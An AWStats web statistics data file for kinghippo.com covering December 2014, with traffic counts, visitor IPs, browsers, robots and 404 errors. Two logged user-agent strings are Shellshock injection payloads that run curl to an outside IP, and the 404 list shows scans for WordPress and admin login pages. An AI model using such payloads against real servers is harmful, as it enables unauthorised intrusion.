AWSTATS DATA FILE 7.0 (build 1.971)
# If you remove this file, all statistics for date 201412 will be lost/reset.
# Last config file used to build this data file was /home/kinghipp/tmp/awstats/awstats.kinghippo.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 2007                
POS_TIME 2684                
POS_VISITOR 9897                
POS_DAY 18374               
POS_DOMAIN 3422                
POS_LOGIN 4120                
POS_ROBOT 4275                
POS_WORMS 4661                
POS_EMAILSENDER 4792                
POS_EMAILRECEIVER 4935                
POS_SESSION 19138               
POS_SIDER 19286               
POS_FILETYPES 5070                
POS_DOWNLOADS 5220                
POS_OS 5291                
POS_BROWSER 5482                
POS_SCREENSIZE 6165                
POS_UNKNOWNREFERER 6239                
POS_UNKNOWNREFERERBROWSER 6889                
POS_ORIGIN 7303                
POS_SEREFERRALS 7442                
POS_PAGEREFS 7586                
POS_SEARCHWORDS 8011                
POS_KEYWORDS 8163                
POS_MISC 2348                
POS_ERRORS 8222                
POS_CLUSTER 3976                
POS_SIDER_404 8345                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20150101051902 17 2893 7618596154375
FirstTime 20141201011819
LastTime 20141231180844
LastUpdate 20150101072103 17 0 16 0 0
TotalVisits 230                 
TotalUnique 214                 
MonthHostsKnown 0                   
MonthHostsUnknown 220                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 10 35 119665 2 4 4711
1 3 8 26706 15 21 32706
2 12 32 106824 6 10 16816
3 12 42 143598 4 7 8285
4 7 27 92959 6 9 18576
5 4 20 66821 7 12 34324
6 11 26 85664 35 51 83290
7 9 11 42015 17 23 43913
8 10 40 138052 13 25 51450
9 39 79 255243 4 6 7484
10 6 26 90186 9 15 23876
11 9 25 80686 4 10 29761
12 12 50 179611 3 11 6527
13 17 44 134666 7 22 40012
14 11 36 122438 5 10 30040
15 13 43 146371 41 57 110505
16 11 26 82891 17 24 45561
17 7 23 75140 13 20 31330
18 9 34 116892 4 10 12348
19 3 13 45093 5 12 15460
20 7 17 56185 8 19 39049
21 5 21 69594 3 5 12075
22 10 15 46117 12 19 30444
23 5 10 32252 7 10 13725
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 36
us 72 103 326843
cn 35 45 118282
br 30 180 634800
it 15 90 317400
de 12 17 51663
ua 9 9 19411
fr 9 24 80118
ru 7 37 129733
sa 6 6 16638
jp 4 4 11092
nl 4 9 29479
ar 4 24 84640
mx 3 18 63480
co 3 18 63480
pl 3 3 8319
pt 2 12 42320
es 2 12 42320
eu 2 2 2773
ca 2 12 42320
lt 2 2 5546
rs 1 6 21160
ph 1 6 21160
ma 1 6 21160
cr 1 6 21160
ec 1 6 21160
id 1 6 21160
cz 1 1 2773
al 1 6 21160
pr 1 6 21160
tw 1 1 2773
ht 1 1 2773
do 1 6 21160
gb 1 1 2773
hu 1 6 21160
se 1 6 21160
lu 1 6 21160
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 7
bot[\s_+:,\.\;\/\\-] 182 350491 20141230160503 63
googlebot 77 180454 20141231160038 20
unknown 20 600 20141231160642 20
robot 17 14613 20141227052727 6
crawl 5 5636 20141221195922 3
no_user_agent 2 5546 20141223113539 0
netcraft 1 2773 20141210073102 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 5
css 97 55096 0 0
html 241 662747 0 0
js 184 1569336 0 0
cgi 1 0 0 0
gif 180 68490 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 1
/robots.txt 112 0 3360
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS 14
blackberry 1
linuxandroid 8
winlong 6
winxp 35
java 8
win2000 6
linuxubuntu 1
winvista 11
linux 8
win7 561
macosx 15
bsdfreebsd 1
win2003 2
Unknown 40
END_OS

# Browser ID - Hits
BEGIN_BROWSER 42
firefox28.0 1
msie6.0 15
firefox3.8 1
firefox20.0 1
chrome34.0.1847.137 3
android 8
firefox4.0 1
firefox18.0 1
chrome38.0.2125.111 2
firefox34.0 6
chrome36.0.1985.125 1
curl 2
firefox2.0.0.13 1
firefox31.0 5
msie8.0 8
chrome39.0.2171.65 1
msie7.0 8
firefox23.0 1
chrome10.0.648.204 9
safari8.0 6
msie9.0 3
chrome26.0.1410.43 1
Unknown 44
blackberry 1
firefox21.0 3
safari6.0 6
firefox3.5.2 13
firefox12.0 3
chrome32.0.1700.107 54
chrome36.0.1985.143 421
firefox1.0 1
mozilla 11
chrome35.0.1916.153 36
firefox22.0 17
firefox14.0.1 1
msie10.0 1
firefox6.0 1
chrome41.0.2228.0 1
firefox4.2 1
firefox3.5 1
firefox36.0 1
firefox15.0.1 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 10
Python-urllib/1.17 20141212072218
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20141212221244
()_{_:;};_/bin/bash_-c_'curl_http://176.102.38.36/search/e.php?h=kinghippo.com/cgi-sys/entropysearch.cgi' 20141215135330
Riddler_(http://riddler.io/about) 20141208101553
()_{_:;};_/bin/bash_-c_'curl_http://176.102.38.36/search/e.php?h=kinghippo.com/' 20141215135330
Scrapy/0.24.4_(_http://scrapy.org) 20141216182008
Mozilla/4.0_(compatible;_Synapse) 20141201032317
nutch-1.4/Nutch-1.4 20141231123917
WWW-Mechanize/1.73 20141203111735
NerdyBot 20141231091731
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 9
Python-urllib/1.17 20141212072218
Java/1.7.0_65 20141202130556
Apache-HttpClient/4.3_(java_1.5) 20141201021330
Riddler_(http://riddler.io/about) 20141208101553
Java/1.7.0_67 20141220121715
Scrapy/0.24.4_(_http://scrapy.org) 20141216182008
nutch-1.4/Nutch-1.4 20141231123917
WWW-Mechanize/1.73 20141203111735
NerdyBot 20141231091731
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 132 143
From1 1 1
From2 0 0
From3 89 89
From4 20 470
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 0
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 7
http://semalt.semalt.com/crawler.php 42 42
http://buttons-for-website.com 31 31
http://make-money-online.7makemoneyonline.com/money.php 12 12
http://privhosting.com 1 1
http://www.eloecomputerconsulting.com 1 1
http://l.facebook.com/l.php 1 1
http://www.maverickjaxson.com 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 4
403 27 48828
302 1 197
206 2 5546
404 72 127584
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 52
/rss.php 2 -
/wp-content/plugins/revslider/release_log.txt 2 -
/archive/archive.css 1 -
/feed.asp 1 -
/admin.php 2 -
/wp-login/ 1 -
/data/admin/ver.txt 1 -
/language/en-GB/en-GB.xml 1 -
/data 1 -
/wordpress/wp-login.php 2 -
/licence.txt 1 -
/common/common.js 1 -
/changelog.txt 1 -
/license.txt 1 -
/blog//wp-login.php 1 -
/admin/wp-login.php 1 -
/digg.php 1 -
/archiver 1 -
/clientscript/vbulletin_ajax_htmlloader.js 1 -
/member/space/company/info.txt 1 -
/admin/template/article_more/config.htm 1 -
/wp/wp-login.php 1 -
/history.txt 1 -
/list.php 1 -
/section/wp-login.php 1 -
/CHANGELOG.txt 1 -
/wp-content 1 -
/inc/Templates/rss.xslt 1 -
/user/ 1 -
/wp//wp-login.php 1 -
/plus/rssmap.html 1 -
/administrator/index.php 4 -
/plus/sitemap.html 1 -
//wp-login.php 1 -
/readme.html 1 -
/admin 1 -
/wp-cron.php 1 -
/help.aspx 1 -
/extern.php 1 -
/administrator/ 2 -
/plus/heightsearch.php 1 -
/blog/wp-login.php 2 -
/wordpress//wp-login.php 1 -
/tools/rss.aspx 1 -
/index.php 5 KINGHIPPO.COM/index.php
/wp-login.php 8 -
/inc/rsd.php 1 -
/admin/inc/xml.xslt 1 -
/site/wp-login.php 1 -
/gsfdfgfdhggfsdgsfdg 1 KINGHIPPO.COM/gsfdfgfdhggfsdgsfdg
/public/js/ips.board.js 1 -
/gsfdfgfdhggfsdgsfdgindex.php 1 KINGHIPPO.COM/gsfdfgfdhggfsdgsfdgindex.php
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 220
198.252.44.10 8 8 22184 20141228205427
5.150.253.8 6 6 16638 20141202130556
46.229.170.197 3 3 8319 20141228232807
148.251.69.136 3 3 8319 20141231070347
144.76.185.173 2 2 5546 20141229065557
46.164.162.5 2 2 5546 20141221065050
69.58.178.58 2 2 5546 20141203124223
213.159.38.90 2 2 5546 20141208035231
202.46.62.51 2 2 5546 20141213222324
195.154.235.55 2 2 5546 20141224130040
76.72.165.17 2 2 5546 20141203004609
74.94.89.221 2 2 5546 20141228023129
176.102.38.36 2 2 0 20141215135330
217.77.220.156 2 2 5546 20141222072459
119.63.193.194 2 2 5546 20141226044116
173.208.182.82 2 2 5546 20141215025427
189.73.233.14 1 6 21160 20141217165417
202.46.50.39 1 1 2773 20141225025839
177.106.122.38 1 6 21160 20141218153505
95.248.81.196 1 6 21160 20141227140012
87.6.125.77 1 6 21160 20141213121336
189.110.95.212 1 6 21160 20141216094848
202.46.54.62 1 1 2773 20141217234843
130.211.164.229 1 1 2773 20141220091714
190.115.189.40 1 1 2773 20141226150249
202.46.62.149 0 1 568 
54.154.119.15 1 1 2773 20141219071429
187.107.128.118 1 6 21160 20141209135244
79.47.157.86 1 6 21160 20141220030333
130.211.154.243 1 1 2773 20141228091717
187.114.169.206 1 6 21160 20141206134726
88.11.242.188 1 6 21160 20141220132840
93.148.8.169 1 6 21160 20141207030057
146.148.64.83 1 1 2773 20141211091824
130.211.161.118 1 1 2773 20141204091721
130.211.182.233 1 1 2773 20141219091736
91.66.254.10 1 1 2773 20141222164037
98.233.24.148 1 6 21160 20141219124709
203.130.238.138 1 6 21160 20141229001114
77.105.59.236 1 6 21160 20141223021910
186.251.125.191 1 6 21160 20141202153350
82.67.127.233 1 6 21160 20141201120620
5.9.11.122 1 1 2773 20141208151810
202.46.63.65 1 1 2773 20141205010135
189.128.116.147 1 6 21160 20141227101239
46.173.66.131 1 1 2773 20141206032621
23.23.222.104 1 1 2773 20141205061536
177.16.77.13 1 6 21160 20141203155500
188.80.181.248 1 6 21160 20141203063534
94.162.226.220 1 6 21160 20141220144618
190.166.255.56 1 6 21160 20141209181615
202.46.48.142 1 1 2773 20141209204904
54.87.37.196 1 1 2773 20141208101553
202.46.54.201 1 1 2773 20141221170326
130.211.165.48 1 1 2773 20141224091709
54.188.197.197 1 1 2773 20141204110444
130.211.134.198 1 1 2773 20141201091805
89.69.56.227 1 1 2773 20141219150947
90.164.112.152 1 6 21160 20141214084425
151.34.3.11 1 6 21160 20141210043738
197.149.12.240 1 6 21160 20141226161715
162.222.177.134 1 1 2773 20141230091702
202.46.61.145 1 1 2773 20141205164509
50.62.58.57 1 1 2773 20141216182008
89.181.37.151 1 6 21160 20141211025213
195.78.109.14 1 1 2773 20141215061822
54.174.186.102 1 1 2773 20141205134802
93.171.205.23 1 1 2773 20141214115023
151.18.252.200 1 6 21160 20141216025344
187.106.80.176 1 6 21160 20141215114638
130.211.149.78 1 1 2773 20141221091708
189.105.146.141 1 6 21160 20141201050338
62.210.82.148 1 1 2773 20141223035726
187.109.190.81 1 6 21160 20141222101203
202.46.50.157 1 1 2773 20141212200101
191.183.110.103 1 6 21160 20141229205125
202.46.63.83 1 1 2773 20141220223035
2.39.197.92 1 6 21160 20141225040107
62.210.84.129 1 1 2773 20141228133646
202.46.62.154 1 1 2773 20141217220152
179.232.82.247 1 6 21160 20141201051551
130.211.128.233 1 1 2773 20141208091824
89.69.56.179 1 1 2773 20141225110631
189.84.78.2 1 6 21160 20141231091956
209.200.117.35 1 3 19831 20141210075405
190.195.157.111 1 6 21160 20141206215124
85.10.199.67 1 1 2773 20141205064635
201.34.119.117 1 6 21160 20141215091648
114.40.172.19 1 1 2773 20141231180844
177.101.216.94 1 6 21160 20141201110544
62.18.107.196 1 6 21160 20141209082104
77.250.23.6 1 6 21160 20141220002508
177.138.84.188 1 6 21160 20141228095434
199.30.24.47 1 4 20399 20141208120316
54.174.177.143 1 1 2773 20141202074210
189.72.71.67 1 6 21160 20141204174252
117.78.13.18 1 1 2773 20141231123917
202.46.50.128 0 1 568 
190.11.199.239 1 6 21160 20141227021305
54.189.39.53 1 1 2773 20141203111735
199.30.25.199 0 5 18387 
199.30.89.35 1 1 2773 20141208211311
179.153.125.47 1 6 21160 20141225142959
186.15.219.201 1 6 21160 20141206144529
177.79.31.201 1 6 21160 20141211154211
177.69.213.238 1 6 21160 20141214182505
112.198.77.133 1 6 21160 20141207034127
202.46.50.60 1 1 2773 20141209220409
216.172.56.37 1 1 2773 20141213003951
38.100.21.78 1 2 3341 20141212113345
130.211.149.23 1 1 2773 20141207091643
179.236.76.195 1 6 21160 20141204232430
181.136.109.117 1 6 21160 20141219005322
130.211.168.164 1 1 2773 20141218091746
93.144.73.176 1 6 21160 20141220125637
79.214.241.206 1 6 21160 20141216152450
202.46.62.55 1 1 2773 20141208154842
187.55.168.77 1 6 21160 20141218082111
130.211.139.73 1 1 2773 20141206091813
187.115.92.59 1 6 21160 20141214184006
202.46.50.38 1 1 2773 20141205024300
93.92.217.228 1 1 2773 20141216043545
130.211.132.2 1 1 2773 20141227091718
202.46.48.208 1 1 2773 20141216223057
187.11.9.1 1 6 21160 20141220093157
82.104.247.160 1 6 21160 20141213033414
179.179.13.172 1 6 21160 20141227083401
177.10.119.252 1 6 21160 20141215143221
186.226.69.171 1 6 21160 20141218153435
148.251.75.46 1 1 2773 20141228232005
202.46.61.124 0 1 568 
177.188.21.122 1 6 21160 20141227171054
66.87.137.235 1 6 21160 20141214103423
202.46.48.48 1 1 2773 20141201074328
202.46.62.203 1 1 2773 20141208142316
23.251.157.164 1 1 2773 20141215091801
37.26.81.234 1 6 21160 20141228034831
130.211.132.237 1 1 2773 20141223091701
150.70.173.7 1 1 2773 20141206084858
123.125.71.14 1 1 2773 20141210003025
200.76.121.249 1 6 21160 20141206084725
130.211.147.221 1 1 2773 20141209091822
82.50.35.20 1 6 21160 20141227110658
195.218.16.179 1 6 21160 20141209044624
202.46.48.153 0 1 568 
37.57.231.204 1 1 2773 20141206174607
202.46.50.36 1 1 2773 20141220231531
74.52.245.146 1 1 2773 20141204054259
23.251.157.251 1 1 2773 20141203091729
108.171.251.115 1 1 2773 20141224195758
202.46.49.54 1 1 2773 20141225221715
90.226.169.11 1 6 21160 20141208131450
107.178.214.194 1 1 2773 20141214091758
144.76.201.69 1 1 2773 20141206082757
202.46.61.56 1 1 2773 20141213092840
202.46.51.150 1 1 2773 20141201215410
146.148.50.243 1 1 2773 20141210091813
89.66.66.178 1 1 2773 20141219164656
123.183.67.154 1 1 2773 20141220121715
177.200.112.46 1 6 21160 20141201181145
5.49.120.160 1 6 21160 20141214094334
179.180.174.201 1 6 21160 20141225225402
146.148.90.167 1 1 2773 20141217132123
202.46.49.58 1 1 2773 20141229223405
186.223.196.96 1 6 21160 20141228120839
202.46.58.148 0 1 568 
167.56.38.172 1 6 21160 20141230091401
37.130.226.90 1 1 2773 20141227035236
77.242.138.198 1 6 21160 20141203064754
93.65.249.34 1 6 21160 20141209162944
108.27.226.248 1 6 21160 20141227010050
177.34.32.188 1 6 21160 20141225192416
176.102.37.93 1 1 2773 20141201032317
189.26.29.235 1 6 21160 20141211092719
130.211.153.221 1 1 2773 20141231091731
190.152.176.7 1 6 21160 20141206213646
191.5.20.153 1 6 21160 20141214210839
130.211.173.181 1 1 2773 20141229091748
187.111.183.160 1 6 21160 20141228173151
179.182.49.20 1 6 21160 20141207002844
107.178.218.230 1 1 2773 20141212091814
119.63.193.132 1 1 2773 20141229144151
190.30.107.54 1 6 21160 20141208200347
79.53.250.93 1 6 21160 20141204065151
183.60.244.29 1 1 2773 20141211063358
130.211.161.50 1 1 2773 20141226091750
188.165.244.215 1 1 2773 20141202092936
54.174.33.133 1 1 2773 20141202073901
195.154.226.90 1 1 2773 20141231084934
204.44.71.193 1 1 2773 20141212072218
130.211.180.219 1 1 2773 20141205091821
72.50.82.86 1 6 21160 20141205195521
202.46.61.59 1 1 2773 20141216161709
177.20.246.1 1 6 21160 20141229051614
202.46.48.151 1 1 2773 20141229033715
202.46.55.115 1 1 2773 20141221201521
117.78.13.51 1 1 2773 20141226001438
202.46.49.19 1 1 2773 20141229144139
123.125.71.85 1 1 2773 20141209150941
23.251.157.187 1 1 2773 20141225091709
177.8.210.8 1 6 21160 20141220185519
69.195.129.178 1 1 2773 20141216220146
66.249.91.4 1 1 2773 20141212221244
146.148.49.229 1 1 2773 20141202091720
185.72.244.38 1 1 0 20141215160225
130.211.85.67 1 1 2773 20141221081045
187.155.125.205 1 6 21160 20141212084330
88.198.56.239 1 1 2773 20141202152119
72.21.217.64 1 1 2773 20141201021330
190.136.125.4 1 6 21160 20141203100259
202.46.57.67 1 1 2773 20141215164857
108.4.84.58 1 6 21160 20141213121619
77.145.170.89 1 6 21160 20141205001630
130.211.117.218 1 1 2773 20141222091727
81.182.91.211 1 6 21160 20141213123258
96.46.194.14 1 6 21160 20141212043923
125.96.160.132 1 6 21160 20141203131911
202.46.51.44 1 1 2773 20141226044105
54.173.72.43 1 1 2773 20141205185717
146.148.39.177 1 1 2773 20141213091754
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20141201 11 38 123574 11
20141202 12 18 52231 7
20141203 12 42 143598 10
20141204 7 22 74572 7
20141205 10 20 64504 10
20141206 10 35 119665 10
20141207 4 19 66253 4
20141208 12 25 87676 11
20141209 9 34 116892 9
20141210 4 12 47105 4
20141211 6 21 71799 6
20141212 10 21 65072 10
20141213 10 30 101278 10
20141214 8 38 132506 8
20141215 12 27 80118 10
20141216 9 24 80118 9
20141217 4 10 30047 4
20141218 4 19 66253 4
20141219 6 16 53412 6
20141220 14 49 167531 13
20141221 7 7 19411 6
20141222 4 9 29479 4
20141223 3 8 26706 3
20141224 4 4 11092 4
20141225 8 28 95732 8
20141226 6 11 35025 6
20141227 9 44 153666 9
20141228 10 30 101278 10
20141229 9 24 80118 9
20141230 2 7 23933 2
20141231 6 11 35025 6
END_DAY

# Session range - Number of visits
BEGIN_SESSION 1
0s-30s 230
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 2
/ 241 662747 230 229
/cgi-sys/entropysearch.cgi 1 0 0 1
END_SIDER
